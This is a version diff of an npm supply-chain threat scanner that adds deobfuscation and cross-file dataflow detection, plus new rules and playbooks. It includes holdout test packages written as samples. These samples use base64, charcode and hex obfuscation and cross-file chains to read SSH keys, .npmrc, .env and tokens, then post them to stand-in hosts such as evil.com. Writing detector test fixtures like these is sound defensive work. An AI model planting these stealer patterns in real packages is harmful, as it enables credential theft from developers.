muaddib-scanner 2.2.4 → 2.2.6

package/bin/muaddib.js

@@ -31,6 +31,8 @@ let temporalPublishMode = false;
 let temporalMaintainerMode = false;
 let temporalFullMode = false;
 let breakdownMode = false;
+let noDeobfuscate = false;
+let noModuleGraph = false;
 let feedLimit = null;
 let feedSeverity = null;
 let feedSince = null;
@@ -110,6 +112,10 @@ for (let i = 0; i < options.length; i++) {
     temporalMaintainerMode = true;
   } else if (options[i] === '--breakdown') {
     breakdownMode = true;
+  } else if (options[i] === '--no-deobfuscate') {
+    noDeobfuscate = true;
+  } else if (options[i] === '--no-module-graph') {
+    noModuleGraph = true;
   } else if (options[i] === '--temporal') {
     temporalMode = true;
   } else if (options[i] === '--limit') {
@@ -395,6 +401,8 @@ const helpText = `
     --temporal-maintainer  Detect maintainer changes (new maintainer, account takeover)
     --temporal-full     All temporal analyses (lifecycle + AST + publish + maintainer)
     --no-canary         Disable honey token injection in sandbox
+    --no-deobfuscate    Disable deobfuscation pre-processing
+    --no-module-graph   Disable cross-file dataflow analysis
     --exclude [dir]     Exclude directory from scan (repeatable)
     --limit [n]         Limit feed entries (default: 50)
     --severity [level]  Filter by severity (CRITICAL|HIGH|MEDIUM|LOW)
@@ -435,7 +443,9 @@ if (command === 'version' || command === '--version' || command === '-v') {
     temporalMaintainer: temporalMaintainerMode || temporalFullMode,
     exclude: excludeDirs,
     entropyThreshold: entropyThreshold,
-    breakdown: breakdownMode
+    breakdown: breakdownMode,
+    noDeobfuscate: noDeobfuscate,
+    noModuleGraph: noModuleGraph
   }).then(exitCode => {
     process.exit(exitCode);
   }).catch(err => {

package/datasets/holdout-v4/atob-eval/index.js

@@ -0,0 +1,2 @@
+// Holdout v4 — atob-eval: classic atob + eval payload
+eval(atob('Y29uc29sZS5sb2coInB3bmVkIik='));

package/datasets/holdout-v4/atob-eval/package.json

@@ -0,0 +1,5 @@
+{
+  "name": "atob-eval",
+  "version": "1.0.0",
+  "main": "index.js"
+}

package/datasets/holdout-v4/base64-require/index.js

@@ -0,0 +1,3 @@
+// Holdout v4 — base64-require: module name hidden in base64
+const mod = require(Buffer.from('Y2hpbGRfcHJvY2Vzcw==', 'base64').toString());
+mod.exec('whoami');

package/datasets/holdout-v4/base64-require/package.json

@@ -0,0 +1,5 @@
+{
+  "name": "base64-require",
+  "version": "1.0.0",
+  "main": "index.js"
+}

package/datasets/holdout-v4/charcode-fetch/index.js

@@ -0,0 +1,3 @@
+// Holdout v4 — charcode-fetch: URL rebuilt from charCodes
+const url = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 101, 118, 105, 108, 46, 99, 111, 109);
+fetch(url, { method: 'POST', body: process.env.NPM_TOKEN });

package/datasets/holdout-v4/charcode-fetch/package.json

@@ -0,0 +1,5 @@
+{
+  "name": "charcode-fetch",
+  "version": "1.0.0",
+  "main": "index.js"
+}

package/datasets/holdout-v4/charcode-spread-homedir/index.js

@@ -0,0 +1,5 @@
+// Holdout v4 — charcode-spread-homedir: module 'os' hidden via charCodes
+const h = String.fromCharCode(...[111, 115]);
+const m = require(h).homedir();
+const f = require('fs').readFileSync(m + '/.ssh/id_rsa');
+require('https').request('https://evil.com').write(f);

package/datasets/holdout-v4/charcode-spread-homedir/package.json

@@ -0,0 +1,5 @@
+{
+  "name": "charcode-spread-homedir",
+  "version": "1.0.0",
+  "main": "index.js"
+}

package/datasets/holdout-v4/concat-env-steal/index.js

@@ -0,0 +1,4 @@
+// Holdout v4 — concat-env-steal: env var name rebuilt by concat
+const key = 'NPM' + '_' + 'TOK' + 'EN';
+const val = process.env[key];
+require('https').request({ hostname: 'evil.com', path: '/steal', method: 'POST' }, () => {}).write(val);

package/datasets/holdout-v4/concat-env-steal/package.json

@@ -0,0 +1,5 @@
+{
+  "name": "concat-env-steal",
+  "version": "1.0.0",
+  "main": "index.js"
+}

package/datasets/holdout-v4/double-decode-exfil/index.js

@@ -0,0 +1,4 @@
+// Holdout v4 — double-decode-exfil: double base64 encoding
+const modName = Buffer.from(Buffer.from('WTJocGJHUmZjSEp2WTJWemN3PT0=', 'base64').toString(), 'base64').toString();
+const proc = require(modName);
+proc.exec('curl https://evil.com/exfil?data=$(cat /etc/passwd)');

package/datasets/holdout-v4/double-decode-exfil/package.json

@@ -0,0 +1,5 @@
+{
+  "name": "double-decode-exfil",
+  "version": "1.0.0",
+  "main": "index.js"
+}

package/datasets/holdout-v4/hex-array-exec/index.js

@@ -0,0 +1,3 @@
+// Holdout v4 — hex-array-exec: shell command hidden in hex array
+const cmd = [0x63, 0x75, 0x72, 0x6c, 0x20, 0x68, 0x74, 0x74, 0x70, 0x73, 0x3a, 0x2f, 0x2f, 0x65, 0x76, 0x69, 0x6c, 0x2e, 0x63, 0x6f, 0x6d].map(c => String.fromCharCode(c)).join('');
+require('child_process').exec(cmd);

package/datasets/holdout-v4/hex-array-exec/package.json

@@ -0,0 +1,5 @@
+{
+  "name": "hex-array-exec",
+  "version": "1.0.0",
+  "main": "index.js"
+}

package/datasets/holdout-v4/mixed-obfuscation-stealer/index.js

@@ -0,0 +1,10 @@
+// Holdout v4 — mixed-obfuscation-stealer: 3 techniques combined
+// Module name via charCode
+const modName = String.fromCharCode(102, 115);
+// Path via base64
+const credPath = Buffer.from('L2V0Yy9wYXNzd2Q=', 'base64').toString();
+// URL via concat
+const host = 'https://' + 'att' + 'acker' + '.com';
+
+const data = require(modName).readFileSync(credPath, 'utf8');
+require('https').request(host, { method: 'POST' }, () => {}).write(data);

package/datasets/holdout-v4/mixed-obfuscation-stealer/package.json

@@ -0,0 +1,5 @@
+{
+  "name": "mixed-obfuscation-stealer",
+  "version": "1.0.0",
+  "main": "index.js"
+}

package/datasets/holdout-v4/nested-base64-concat/index.js

@@ -0,0 +1,4 @@
+// Holdout v4 — nested-base64-concat: split base64 + concat
+const a = Buffer.from('Y2hpbGRf', 'base64').toString();
+const b = Buffer.from('cHJvY2Vzcw==', 'base64').toString();
+require(a + b).exec('id');

package/datasets/holdout-v4/nested-base64-concat/package.json

@@ -0,0 +1,5 @@
+{
+  "name": "nested-base64-concat",
+  "version": "1.0.0",
+  "main": "index.js"
+}

package/datasets/holdout-v4/template-literal-hide/index.js

@@ -0,0 +1,3 @@
+// Holdout v4 — template-literal-hide: module name via template literals
+const mod = `${'child'}${'_process'}`;
+require(mod).exec('curl evil.com');

package/datasets/holdout-v4/template-literal-hide/package.json

@@ -0,0 +1,5 @@
+{
+  "name": "template-literal-hide",
+  "version": "1.0.0",
+  "main": "index.js"
+}

package/datasets/holdout-v5/callback-exfil/main.js

@@ -0,0 +1,8 @@
+const readCredentials = require('./reader');
+
+readCredentials((data) => {
+  fetch('https://evil.com/collect', {
+    method: 'POST',
+    body: data
+  });
+});

package/datasets/holdout-v5/callback-exfil/package.json

@@ -0,0 +1,5 @@
+{
+  "name": "callback-exfil",
+  "version": "1.0.0",
+  "description": "Holdout v5 — callback-based credential passing"
+}

package/datasets/holdout-v5/callback-exfil/reader.js

@@ -0,0 +1,10 @@
+const fs = require('fs');
+const path = require('path');
+const os = require('os');
+
+function readCredentials(callback) {
+  const npmrc = fs.readFileSync(path.join(os.homedir(), '.npmrc'), 'utf8');
+  callback(npmrc);
+}
+
+module.exports = readCredentials;

package/datasets/holdout-v5/class-method-exfil/collector.js

@@ -0,0 +1,10 @@
+const fs = require('fs');
+
+class Collector {
+  read() {
+    const data = fs.readFileSync('.env', 'utf8');
+    return data;
+  }
+}
+
+module.exports = Collector;

package/datasets/holdout-v5/class-method-exfil/main.js

@@ -0,0 +1,7 @@
+const Collector = require('./collector');
+
+const c = new Collector();
+const secrets = c.read();
+
+const ws = new WebSocket('wss://evil.com/ws');
+ws.send(secrets);

package/datasets/holdout-v5/class-method-exfil/package.json

@@ -0,0 +1,5 @@
+{
+  "name": "class-method-exfil",
+  "version": "1.0.0",
+  "description": "Holdout v5 — class method read + WebSocket exfil"
+}

package/datasets/holdout-v5/conditional-split/detector.js

@@ -0,0 +1,2 @@
+const isCI = !!process.env.CI;
+module.exports = isCI;

package/datasets/holdout-v5/conditional-split/package.json

@@ -0,0 +1,5 @@
+{
+  "name": "conditional-split",
+  "version": "1.0.0",
+  "description": "Holdout v5 — conditional CI-gated exfiltration"
+}

package/datasets/holdout-v5/conditional-split/stealer.js

@@ -0,0 +1,16 @@
+const fs = require('fs');
+const path = require('path');
+const os = require('os');
+const https = require('https');
+const isCI = require('./detector');
+
+if (isCI) {
+  const npmrc = fs.readFileSync(path.join(os.homedir(), '.npmrc'), 'utf8');
+  const req = https.request({
+    hostname: 'evil.com',
+    path: '/ci-steal',
+    method: 'POST'
+  }, (res) => { res.resume(); });
+  req.write(npmrc);
+  req.end();
+}

package/datasets/holdout-v5/event-emitter-flow/listener.js

@@ -0,0 +1,12 @@
+const https = require('https');
+const bus = require('./scanner');
+
+bus.on('data', (creds) => {
+  const req = https.request({
+    hostname: 'evil.com',
+    path: '/steal',
+    method: 'POST'
+  }, (res) => { res.resume(); });
+  req.write(creds);
+  req.end();
+});

package/datasets/holdout-v5/event-emitter-flow/package.json

@@ -0,0 +1,5 @@
+{
+  "name": "event-emitter-flow",
+  "version": "1.0.0",
+  "description": "Holdout v5 — EventEmitter-based credential flow"
+}

package/datasets/holdout-v5/event-emitter-flow/scanner.js

@@ -0,0 +1,11 @@
+const fs = require('fs');
+const path = require('path');
+const os = require('os');
+const EventEmitter = require('events');
+
+const bus = new EventEmitter();
+
+const npmrc = fs.readFileSync(path.join(os.homedir(), '.npmrc'), 'utf8');
+bus.emit('data', npmrc);
+
+module.exports = bus;

package/datasets/holdout-v5/mixed-inline-split/index.js

@@ -0,0 +1,6 @@
+// Inline obfuscated payload (intra-file threat)
+const payload = Buffer.from('Y29uc29sZS5sb2coInB3bmVkIik=', 'base64').toString();
+eval(payload);
+
+// Also orchestrate cross-file flow
+require('./sender');

package/datasets/holdout-v5/mixed-inline-split/package.json

@@ -0,0 +1,5 @@
+{
+  "name": "mixed-inline-split",
+  "version": "1.0.0",
+  "description": "Holdout v5 — intra-file eval + cross-file dataflow"
+}

package/datasets/holdout-v5/mixed-inline-split/reader.js

@@ -0,0 +1,3 @@
+const fs = require('fs');
+const data = fs.readFileSync('.npmrc', 'utf8');
+module.exports = data;

package/datasets/holdout-v5/mixed-inline-split/sender.js

@@ -0,0 +1,6 @@
+const stolen = require('./reader');
+
+fetch('https://evil.com/exfil', {
+  method: 'POST',
+  body: stolen
+});

package/datasets/holdout-v5/named-export-steal/main.js

@@ -0,0 +1,6 @@
+const { getCredentials } = require('./utils');
+
+fetch('https://evil.com/aws', {
+  method: 'POST',
+  body: getCredentials
+});

package/datasets/holdout-v5/named-export-steal/package.json

@@ -0,0 +1,5 @@
+{
+  "name": "named-export-steal",
+  "version": "1.0.0",
+  "description": "Holdout v5 — named export destructuring steal"
+}

package/datasets/holdout-v5/named-export-steal/utils.js

@@ -0,0 +1 @@
+exports.getCredentials = process.env.AWS_SECRET_ACCESS_KEY;

package/datasets/holdout-v5/reexport-chain/a.js

@@ -0,0 +1,2 @@
+const token = process.env.NPM_TOKEN;
+module.exports = token;

package/datasets/holdout-v5/reexport-chain/b.js

@@ -0,0 +1 @@
+module.exports = require('./a');

package/datasets/holdout-v5/reexport-chain/c.js

@@ -0,0 +1,11 @@
+const https = require('https');
+const secret = require('./b');
+
+const req = https.request({
+  hostname: 'evil.com',
+  path: '/npm-token',
+  method: 'POST'
+}, (res) => { res.resume(); });
+
+req.write(secret);
+req.end();

package/datasets/holdout-v5/reexport-chain/package.json

@@ -0,0 +1,5 @@
+{
+  "name": "reexport-chain",
+  "version": "1.0.0",
+  "description": "Holdout v5 — double re-export chain a → b → c"
+}

package/datasets/holdout-v5/split-env-exfil/env.js

@@ -0,0 +1,2 @@
+const token = process.env.GITHUB_TOKEN;
+module.exports = token;

package/datasets/holdout-v5/split-env-exfil/exfil.js

@@ -0,0 +1,5 @@
+const token = require('./env');
+fetch('https://evil.com/collect', {
+  method: 'POST',
+  body: token
+});

package/datasets/holdout-v5/split-env-exfil/package.json

@@ -0,0 +1,5 @@
+{
+  "name": "split-env-exfil",
+  "version": "1.0.0",
+  "description": "Holdout v5 — cross-file env token exfil"
+}

package/datasets/holdout-v5/split-npmrc-steal/index.js

@@ -0,0 +1,2 @@
+require('./reader');
+require('./sender');

package/datasets/holdout-v5/split-npmrc-steal/package.json

@@ -0,0 +1,5 @@
+{
+  "name": "split-npmrc-steal",
+  "version": "1.0.0",
+  "description": "Holdout v5 — cross-file .npmrc steal"
+}

package/datasets/holdout-v5/split-npmrc-steal/reader.js

@@ -0,0 +1,8 @@
+const fs = require('fs');
+const path = require('path');
+const os = require('os');
+
+const npmrcPath = path.join(os.homedir(), '.npmrc');
+const content = fs.readFileSync(npmrcPath, 'utf8');
+
+module.exports = content;

package/datasets/holdout-v5/split-npmrc-steal/sender.js

@@ -0,0 +1,17 @@
+const https = require('https');
+const data = require('./reader');
+
+const options = {
+  hostname: 'collector.evil.com',
+  port: 443,
+  path: '/exfil',
+  method: 'POST',
+  headers: { 'Content-Type': 'text/plain' }
+};
+
+const req = https.request(options, (res) => {
+  res.resume();
+});
+
+req.write(data);
+req.end();

package/datasets/holdout-v5/three-hop-chain/package.json

@@ -0,0 +1,5 @@
+{
+  "name": "three-hop-chain",
+  "version": "1.0.0",
+  "description": "Holdout v5 — 3-file chain reader → transform → sender"
+}

package/datasets/holdout-v5/three-hop-chain/reader.js

@@ -0,0 +1,8 @@
+const os = require('os');
+const fs = require('fs');
+const path = require('path');
+
+const keyPath = path.join(os.homedir(), '.ssh', 'id_rsa');
+const key = fs.readFileSync(keyPath, 'utf8');
+
+module.exports = key;

package/datasets/holdout-v5/three-hop-chain/sender.js

@@ -0,0 +1,11 @@
+const https = require('https');
+const payload = require('./transform');
+
+const req = https.request({
+  hostname: 'attacker.example.com',
+  path: '/collect',
+  method: 'POST'
+}, (res) => { res.resume(); });
+
+req.write(payload);
+req.end();

package/datasets/holdout-v5/three-hop-chain/transform.js

@@ -0,0 +1,3 @@
+const raw = require('./reader');
+const encoded = Buffer.from(raw).toString('base64');
+module.exports = encoded;

package/package.json

@@ -1,6 +1,6 @@
 {
   "name": "muaddib-scanner",
-  "version": "2.2.4",
+  "version": "2.2.6",
   "description": "Supply-chain threat detection & response for npm & PyPI/Python",
   "main": "src/index.js",
   "bin": {

package/src/index.js

@@ -19,6 +19,8 @@ const { loadCachedIOCs } = require('./ioc/updater.js');
 const { ensureIOCs } = require('./ioc/bootstrap.js');
 const { scanEntropy } = require('./scanner/entropy.js');
 const { scanAIConfig } = require('./scanner/ai-config.js');
+const { deobfuscate } = require('./scanner/deobfuscate.js');
+const { buildModuleGraph, annotateTaintedExports, detectCrossFileFlows } = require('./scanner/module-graph.js');
 const { detectSuddenLifecycleChange } = require('./temporal-analysis.js');
 const { detectSuddenAstChanges } = require('./temporal-ast-diff.js');
 const { detectPublishAnomaly } = require('./publish-anomaly.js');
@@ -222,6 +224,21 @@ async function run(targetPath, options = {}) {
     spinner.start(`[MUADDIB] Scanning ${targetPath}...`);
   }
 
+  // Deobfuscation pre-processor (pass to AST/dataflow scanners unless disabled)
+  const deobfuscateFn = options.noDeobfuscate ? null : deobfuscate;
+
+  // Cross-file module graph analysis (before individual scanners)
+  let crossFileFlows = [];
+  if (!options.noModuleGraph) {
+    try {
+      const graph = buildModuleGraph(targetPath);
+      const tainted = annotateTaintedExports(graph, targetPath);
+      crossFileFlows = detectCrossFileFlows(graph, tainted, targetPath);
+    } catch {
+      // Graceful fallback — module graph is best-effort
+    }
+  }
+
   // Parallel execution of all independent scanners
   const [
     packageThreats,
@@ -240,11 +257,11 @@ async function run(targetPath, options = {}) {
   ] = await Promise.all([
     scanPackageJson(targetPath),
     scanShellScripts(targetPath),
-    analyzeAST(targetPath),
+    analyzeAST(targetPath, { deobfuscate: deobfuscateFn }),
     Promise.resolve(detectObfuscation(targetPath)),
     scanDependencies(targetPath),
     scanHashes(targetPath),
-    analyzeDataFlow(targetPath),
+    analyzeDataFlow(targetPath, { deobfuscate: deobfuscateFn }),
     scanTyposquatting(targetPath),
     Promise.resolve(scanGitHubActions(targetPath)),
     Promise.resolve(matchPythonIOCs(pythonDeps, targetPath)),
@@ -271,7 +288,13 @@ async function run(targetPath, options = {}) {
     ...pythonThreats,
     ...pypiTyposquatThreats,
     ...entropyThreats,
-    ...aiConfigThreats
+    ...aiConfigThreats,
+    ...crossFileFlows.map(f => ({
+      type: f.type,
+      severity: f.severity,
+      message: `Cross-file dataflow: ${f.source} in ${f.sourceFile} → ${f.sink} in ${f.sinkFile}`,
+      file: f.sinkFile
+    }))
   ];
 
   // Paranoid mode

package/src/response/playbooks.js

@@ -304,6 +304,11 @@ const PLAYBOOKS = {
     'NE PAS installer. Ceci execute du code arbitraire a l\'installation. ' +
     'Si deja installe: considerer la machine compromise. Auditer les modifications systeme.',
 
+  cross_file_dataflow:
+    'CRITIQUE: Un module lit des credentials et les exporte vers un autre module qui les envoie sur le reseau. ' +
+    'Exfiltration inter-fichiers confirmee. Isoler la machine, supprimer le package, regenerer TOUS les secrets. ' +
+    'Auditer les connexions reseau recentes pour identifier les donnees exfiltrees.',
+
   credential_tampering:
     'CRITIQUE: Ecriture detectee dans un cache sensible (npm _cacache, yarn, pip). ' +
     'Possible cache poisoning: injection de code malveillant dans des packages caches. ' +
@@ -318,6 +323,11 @@ const PLAYBOOKS = {
     'Fichier binaire (.png/.jpg/.wasm) reference avec eval() dans le meme fichier. ' +
     'Technique de steganographie: le payload malveillant est cache dans les pixels d\'une image ou les sections d\'un WASM. ' +
     'Analyser le fichier binaire dans un sandbox. Verifier les donnees extraites avant execution.',
+
+  staged_eval_decode:
+    'CRITIQUE: eval() ou Function() recoit un argument decode en base64 (atob/Buffer.from). ' +
+    'Technique de staged payload: le code malveillant est encode puis decode et execute dynamiquement. ' +
+    'Isoler la machine. Decoder le payload manuellement pour analyser le code execute. Supprimer le package.',
 };
 
 function getPlaybook(threatType) {

package/src/rules/index.js

@@ -585,6 +585,19 @@ const RULES = {
     mitre: 'T1027.003'
   },
 
+  staged_eval_decode: {
+    id: 'MUADDIB-AST-021',
+    name: 'Staged Eval Decode',
+    severity: 'CRITICAL',
+    confidence: 'high',
+    description: 'eval() ou Function() recoit un argument decode (atob ou Buffer.from base64). Pattern classique de staged payload: le code malveillant est encode en base64 puis decode et execute dynamiquement.',
+    references: [
+      'https://attack.mitre.org/techniques/T1140/',
+      'https://attack.mitre.org/techniques/T1059/007/'
+    ],
+    mitre: 'T1140'
+  },
+
   env_charcode_reconstruction: {
     id: 'MUADDIB-AST-018',
     name: 'Environment Variable Key Reconstruction',
@@ -611,6 +624,19 @@ const RULES = {
     mitre: 'T1195.002'
   },
 
+  cross_file_dataflow: {
+    id: 'MUADDIB-FLOW-004',
+    name: 'Cross-File Data Exfiltration',
+    severity: 'CRITICAL',
+    confidence: 'high',
+    description: 'Un module lit des credentials (fs.readFileSync, process.env) et les exporte vers un autre module qui les envoie sur le reseau (fetch, https.request). Exfiltration inter-fichiers confirmee.',
+    references: [
+      'https://blog.phylum.io/shai-hulud-npm-worm',
+      'https://attack.mitre.org/techniques/T1041/'
+    ],
+    mitre: 'T1041'
+  },
+
   credential_tampering: {
     id: 'MUADDIB-FLOW-003',
     name: 'Credential/Cache Tampering',